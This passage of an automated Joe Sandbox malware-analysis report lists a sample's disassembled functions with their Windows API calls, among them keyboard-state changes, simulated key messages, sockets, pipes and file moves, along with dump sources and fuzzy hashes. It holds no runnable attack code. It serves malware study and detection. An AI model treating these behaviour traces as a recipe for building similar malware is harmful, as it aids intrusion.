              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: c6b0677d31a133b0d5b3dc77feeb8cfc124040251a42e2102a794be778532668
              • Instruction ID: 16a6b96ed0d673094e6aa13202e88f6780cdc55d6e41ce18a1dd90e1f356f48a
              • Opcode Fuzzy Hash: c6b0677d31a133b0d5b3dc77feeb8cfc124040251a42e2102a794be778532668
              • Instruction Fuzzy Hash: 9E5182A06047D63DFB364234C84ABBBBEA95B06304F088589E2D9594D3D3DDEDC8D751
              Function 0073ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
              Download Yara Rule
              APIs
              • GetParent.USER32(00000000), ref: 0073AD19
              • GetKeyboardState.USER32(?), ref: 0073AD2E
              • SetKeyboardState.USER32(?), ref: 0073AD8F
              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0073ADBB
              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0073ADD8
              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0073AE17
              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0073AE38
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: af5ae70e6b4cd819382befcc31a51b298cd98d25e86410dd415f496c1cd5ffad
              • Instruction ID: 0447e52ab97c429342cdcf0af972e4bdb83a60a4f4b22822ef6659b011641b9f
              • Opcode Fuzzy Hash: af5ae70e6b4cd819382befcc31a51b298cd98d25e86410dd415f496c1cd5ffad
              • Instruction Fuzzy Hash: 5551D2A1A547D53DFB378334CC57B7ABEA86B46300F088588E1D54A8C3D29CEC88D762
              Function 0070542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetConsoleCP.KERNEL32(00713CD6,?,?,?,?,?,?,?,?,00705BA3,?,?,00713CD6,?,?), ref: 00705470
              • __fassign.LIBCMT ref: 007054EB
              • __fassign.LIBCMT ref: 00705506
              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00713CD6,00000005,00000000,00000000), ref: 0070552C
              • WriteFile.KERNEL32(?,00713CD6,00000000,00705BA3,00000000,?,?,?,?,?,?,?,?,?,00705BA3,?), ref: 0070554B
              • WriteFile.KERNEL32(?,?,00000001,00705BA3,00000000,?,?,?,?,?,?,?,?,?,00705BA3,?), ref: 00705584
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: 72148edba0950030cd261861e038906098e80c9f425ffcf3c2ccfba6e8bb0a1d
              • Instruction ID: 93e5faad942c77b0f136366034d5f8c680b91afc7a060824a6dc58f200d304ff
              • Opcode Fuzzy Hash: 72148edba0950030cd261861e038906098e80c9f425ffcf3c2ccfba6e8bb0a1d
              • Instruction Fuzzy Hash: 3351D1B0A00648DFDB11CFA8DC45AEEBBFAEF09300F14421AF546E3291E6349A51CF64
              Function 007510B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0075304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0075307A
                • Part of subcall function 0075304E: _wcslen.LIBCMT ref: 0075309B
              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00751112
              • WSAGetLastError.WSOCK32 ref: 00751121
              • WSAGetLastError.WSOCK32 ref: 007511C9
              • closesocket.WSOCK32(00000000), ref: 007511F9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
              • String ID:
              • API String ID: 2675159561-0
              • Opcode ID: cc31d782b140be486cd05b6e0f5af7f5728540ecf732877cb0a390cfa3051aa6
              • Instruction ID: feb7fcc3ecfa8e6373ac689c27c791dc93df588096a601cf97eda304a8dc937c
              • Opcode Fuzzy Hash: cc31d782b140be486cd05b6e0f5af7f5728540ecf732877cb0a390cfa3051aa6
              • Instruction Fuzzy Hash: 73412731600608AFDB109F24C884BE9B7EAEF44326F148099FD469B291C7B8ED45CBE5
              Function 0073CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0073CF22,?), ref: 0073DDFD
                • Part of subcall function 0073DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0073CF22,?), ref: 0073DE16
              • lstrcmpiW.KERNEL32(?,?), ref: 0073CF45
              • MoveFileW.KERNEL32(?,?), ref: 0073CF7F
              • _wcslen.LIBCMT ref: 0073D005
              • _wcslen.LIBCMT ref: 0073D01B
              • SHFileOperationW.SHELL32(?), ref: 0073D061
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
              • String ID: \*.*
              • API String ID: 3164238972-1173974218
              • Opcode ID: 373d02fcb99c48e86bf8d21b40618f4b2438aaaa9cbbe721821abaf7dd37aecd
              • Instruction ID: 9601f03266f9bd683ce9cf6b0f7c8f76a9196e5331cd82915d131985145e2991
              • Opcode Fuzzy Hash: 373d02fcb99c48e86bf8d21b40618f4b2438aaaa9cbbe721821abaf7dd37aecd
              • Instruction Fuzzy Hash: 06414672D0521D9EEF16EBA4D985AEE77B9AF08340F0000E6E545EB142EB38AA44CF54
              Function 00762DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00762E1C
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00762E4F
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00762E84
              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00762EB6
              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00762EE0
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00762EF1
              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00762F0B
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LongWindow$MessageSend
              • String ID:
              • API String ID: 2178440468-0
              • Opcode ID: 7a5ad5d8c28bb9b865106da4adab3ab8c8fc295b98a752fb29028662771842c9
              • Instruction ID: b9434c6ee2478be88427f775a08e3c143a25a46c4fd52119f2fb3df546c61c9b
              • Opcode Fuzzy Hash: 7a5ad5d8c28bb9b865106da4adab3ab8c8fc295b98a752fb29028662771842c9
              • Instruction Fuzzy Hash: C23139306446409FEB61CF58DC88F6537E0FB9A710F1541A5F9529F2B2CBBAAC41DB09
              Function 00737726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00737769
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0073778F
              • SysAllocString.OLEAUT32(00000000), ref: 00737792
              • SysAllocString.OLEAUT32(?), ref: 007377B0
              • SysFreeString.OLEAUT32(?), ref: 007377B9
              • StringFromGUID2.OLE32(?,?,00000028), ref: 007377DE
              • SysAllocString.OLEAUT32(?), ref: 007377EC
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              • Opcode ID: 203ff3479cfcecbc6a24dcacf9b1fa21ab4bc7a9532e15ebe7a3c5339a1714b5
              • Instruction ID: 905302cf645ea7bf19f148562bf9405b07415cf1316ca88ab69910b5868b256d
              • Opcode Fuzzy Hash: 203ff3479cfcecbc6a24dcacf9b1fa21ab4bc7a9532e15ebe7a3c5339a1714b5
              • Instruction Fuzzy Hash: 4721C4B6609219AFEF24DFA9CC88CBB77ACEB09364B008025F905DB151DAB8DC41C764
              Function 007377FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00737842
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00737868
              • SysAllocString.OLEAUT32(00000000), ref: 0073786B
              • SysAllocString.OLEAUT32 ref: 0073788C
              • SysFreeString.OLEAUT32 ref: 00737895
              • StringFromGUID2.OLE32(?,?,00000028), ref: 007378AF
              • SysAllocString.OLEAUT32(?), ref: 007378BD
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              • Opcode ID: 8093e5513709c9aff3a1afb3415f77b4b5f8ede55843d04233219e39ba61d556
              • Instruction ID: e8c4cc6ed81ea05ec160518e5ebf34c4d69a3caa67b58542d631519cc673d62e
              • Opcode Fuzzy Hash: 8093e5513709c9aff3a1afb3415f77b4b5f8ede55843d04233219e39ba61d556
              • Instruction Fuzzy Hash: 3921C771605305BFEB249FA9CC88DBA77ECEB09360B108025F955DB1A1DA78DC41CB68
              Function 007404D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
              Download Yara Rule
              APIs
              • GetStdHandle.KERNEL32(0000000C), ref: 007404F2
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0074052E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateHandlePipe
              • String ID: nul
              • API String ID: 1424370930-2873401336
              • Opcode ID: a3b9fd20309b675d013962801efb4031f8a59f66ce1eaac0174a8aa3c32314d0
              • Instruction ID: 1ed6b0ae9746cf76329a977088bf188d6789a4ecf8eb0a35fe2322b87cdec4d2
              • Opcode Fuzzy Hash: a3b9fd20309b675d013962801efb4031f8a59f66ce1eaac0174a8aa3c32314d0
              • Instruction Fuzzy Hash: D72162755003059FDF209F29DC44E5AB7A4FF45724F204A19F9A1E72E0D7749960CFA0
              Function 007405A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
              Download Yara Rule
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 007405C6
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00740601
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CreateHandlePipe
              • String ID: nul
              • API String ID: 1424370930-2873401336
              • Opcode ID: bcd0efed980d3023c39921f52fa58164d8d19dbd06c047e5e0b18597057b5c57
              • Instruction ID: b03be76a21f565ee09cbc3a2660e6efd93a7f04d0da6d579e47c2e76eeaef315
              • Opcode Fuzzy Hash: bcd0efed980d3023c39921f52fa58164d8d19dbd06c047e5e0b18597057b5c57
              • Instruction Fuzzy Hash: 7421A3755003059FDB209F698C08A6A77E4BF85720F204A19FEA2E72D0D7B49860CB95
              Function 007640AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006D604C
                • Part of subcall function 006D600E: GetStockObject.GDI32(00000011), ref: 006D6060
                • Part of subcall function 006D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006D606A
              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00764112
              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0076411F
              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0076412A
              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00764139
              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00764145
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend$CreateObjectStockWindow
              • String ID: Msctls_Progress32
              • API String ID: 1025951953-3636473452
              • Opcode ID: 3ecfc59030ac7d15fad0aa5f2d1c86abb04ce2bb1f493cc7eba3eb5208b7fe63
              • Instruction ID: 93e9be30a6fade97cbfa1dfe121dc6c79434937424a38b0d17747306aba4796b
              • Opcode Fuzzy Hash: 3ecfc59030ac7d15fad0aa5f2d1c86abb04ce2bb1f493cc7eba3eb5208b7fe63
              • Instruction Fuzzy Hash: 2811B2B215021DBEEF119F64CC85EE77F9DEF09798F008111FB18A2150C6769C61DBA4
              Function 0070D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 0070D7A3: _free.LIBCMT ref: 0070D7CC
              • _free.LIBCMT ref: 0070D82D
                • Part of subcall function 007029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000), ref: 007029DE
                • Part of subcall function 007029C8: GetLastError.KERNEL32(00000000,?,0070D7D1,00000000,00000000,00000000,00000000,?,0070D7F8,00000000,00000007,00000000,?,0070DBF5,00000000,00000000), ref: 007029F0
              • _free.LIBCMT ref: 0070D838
              • _free.LIBCMT ref: 0070D843
              • _free.LIBCMT ref: 0070D897
              • _free.LIBCMT ref: 0070D8A2
              • _free.LIBCMT ref: 0070D8AD
              • _free.LIBCMT ref: 0070D8B8
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
              • Instruction ID: 024ac15da0b9ead7d85a1111eb4275f0f5704047666e8745ef4d7d909c2409d9
              • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
              • Instruction Fuzzy Hash: 4D111F72540B04EAD531BFF4CC4FFCB7BDC6F44700F405A25B299A64E3DA69B9064A50
              Function 0073DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
              Download Yara Rule
              APIs
              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0073DA74
              • LoadStringW.USER32(00000000), ref: 0073DA7B
              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0073DA91
              • LoadStringW.USER32(00000000), ref: 0073DA98
              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0073DADC
              Strings
              • %s (%d) : ==> %s: %s %s, xrefs: 0073DAB9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: HandleLoadModuleString$Message
              • String ID: %s (%d) : ==> %s: %s %s
              • API String ID: 4072794657-3128320259
              • Opcode ID: f647ab84417c0893590261e75d3c1f7d0b3d07478031c99ad41f574c072ce597
              • Instruction ID: 0058098c906b0a97d094fa9ce3aede9b8d9f6a5691325e5b7c5e842c360f8389
              • Opcode Fuzzy Hash: f647ab84417c0893590261e75d3c1f7d0b3d07478031c99ad41f574c072ce597
              • Instruction Fuzzy Hash: 8501FFF6500308BBF7129BA49D89EF6766CE708701F408596F786E2042E6B89E844B78
              Function 0074096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
              Download Yara Rule
              APIs
              • InterlockedExchange.KERNEL32(0173EA38,0173EA38), ref: 0074097B
              • EnterCriticalSection.KERNEL32(0173EA18,00000000), ref: 0074098D
              • TerminateThread.KERNEL32(006F0074,000001F6), ref: 0074099B
              • WaitForSingleObject.KERNEL32(006F0074,000003E8), ref: 007409A9
              • CloseHandle.KERNEL32(006F0074), ref: 007409B8
              • InterlockedExchange.KERNEL32(0173EA38,000001F6), ref: 007409C8
              • LeaveCriticalSection.KERNEL32(0173EA18), ref: 007409CF
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
              • String ID:
              • API String ID: 3495660284-0
              • Opcode ID: 29e0ea2f7e5493783159cc9e6b0c0d07287a7c6a370f32ca219b43f5a54b5196
              • Instruction ID: 85db687b73f16f64aa41c217686148b59ab7c0e1b06ea22aaf8513662847196b
              • Opcode Fuzzy Hash: 29e0ea2f7e5493783159cc9e6b0c0d07287a7c6a370f32ca219b43f5a54b5196
              • Instruction Fuzzy Hash: 24F03131442602BFD7425FA5EE9DBE67B35FF01702F405015F242608A0C7B9A465CFA4
              Function 00751C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
              Download Yara Rule
              APIs
              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00751DC0
              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00751DE1
              • WSAGetLastError.WSOCK32 ref: 00751DF2
              • htons.WSOCK32(?,?,?,?,?), ref: 00751EDB
              • inet_ntoa.WSOCK32(?), ref: 00751E8C
                • Part of subcall function 007339E8: _strlen.LIBCMT ref: 007339F2
                • Part of subcall function 00753224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0074EC0C), ref: 00753240
              • _strlen.LIBCMT ref: 00751F35
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
              • String ID:
              • API String ID: 3203458085-0
              • Opcode ID: 1dc77a46487714e80ee028425aba4bde570faed49da184eceaea87af369acbea
              • Instruction ID: 1de4affccaffc7d261ae86323e0dea41cfb4fc672c44a56443b080907fa203ed
              • Opcode Fuzzy Hash: 1dc77a46487714e80ee028425aba4bde570faed49da184eceaea87af369acbea
              • Instruction Fuzzy Hash: 89B1D030604340AFD324DF24C885F6A77E6AF84319F94894CF8565B2E2DBB5ED46CB91
              Function 007001B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
              Download Yara Rule
              APIs
              • __allrem.LIBCMT ref: 007000BA
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007000D6
              • __allrem.LIBCMT ref: 007000ED
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0070010B
              • __allrem.LIBCMT ref: 00700122
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00700140
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
